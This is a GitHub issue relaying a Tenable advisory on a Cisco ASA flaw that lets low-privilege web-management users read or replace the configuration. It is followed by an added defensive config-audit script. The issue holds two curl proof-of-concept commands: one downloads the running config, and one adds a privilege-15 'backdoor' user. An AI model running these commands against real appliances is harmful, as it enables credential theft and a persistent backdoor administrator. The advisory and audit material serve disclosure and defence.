
Cisco ASA Privilege Escalation Flaw

Open peterpt opened this issue 5 years ago • 0 comments

https://www.tenable.com/blog/privilege-escalation-flaw-discovered-in-the-cisco-adaptive-security-appliance

Analysis

When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download the running configuration as well as upload or replace the appliance firmware. Downgrading appliance firmware to an older version would allow an attacker to leverage known vulnerabilities that have been well researched or have publicly available exploit modules.

A simple proof of concept for downloading the running configuration follows:

curl --basic -u notadmin -p -k http:///admin/system/running-config

The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:

curl --basic -u notadmin -p -k -X "POST" --data-binary "username fourthuser password backdoor privilege 15" "http:///admin/config"

According to Cisco, “This vulnerability affects Cisco ASA Software that is running on any Cisco product that has web management access enabled.”

peterpt, Dec 23 '18 21:12
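
A defender-side check for the two preconditions quoted in the issue above (web management access enabled, command authorization not enabled), as an added example that is not part of the issue or of Tenable's post. The sample configurations are constructed, and matching on `http server enable`, `aaa authorization command` and `username ... privilege N` lines is an assumption about how these settings appear in an exported ASA running-config.

```python
import re

# Constructed running-config excerpts for illustration (not from a real device).
EXPOSED = """\
hostname asa-lab
username notadmin password ***** privilege 1
username netops password ***** privilege 15
http server enable
http 0.0.0.0 0.0.0.0 outside
aaa authentication http console LOCAL
"""

HARDENED = """\
hostname asa-lab
username notadmin password ***** privilege 1
http server enable
http 10.0.0.0 255.255.255.0 management
aaa authentication http console LOCAL
aaa authorization command LOCAL
"""


def audit(config: str) -> dict:
    """Flag the preconditions named in the advisory text for one running-config."""
    # Drop blank lines and '!' comment separators before matching.
    lines = [l.strip() for l in config.splitlines()]
    lines = [l for l in lines if l and not l.startswith("!")]

    web_mgmt = any(re.match(r"http server enable\b", l) for l in lines)
    cmd_authz = any(re.match(r"aaa authorization command\b", l) for l in lines)

    # Accounts at privilege level 0 or 1, the levels the advisory calls unprivileged.
    low_priv = [m.group(1) for l in lines
                if (m := re.match(r"username (\S+) .*\bprivilege ([01])$", l))]

    return {
        "web_management_enabled": web_mgmt,
        "command_authorization_enabled": cmd_authz,
        "low_privilege_users": low_priv,
        # Both conditions from the quoted analysis hold at once.
        "preconditions_met": web_mgmt and not cmd_authz,
    }


if __name__ == "__main__":
    for name, cfg in (("EXPOSED", EXPOSED), ("HARDENED", HARDENED)):
        print(name, audit(cfg))
```

A `preconditions_met` result of `False` only means the configuration conditions quoted above are absent; it says nothing about whether the installed software version is patched.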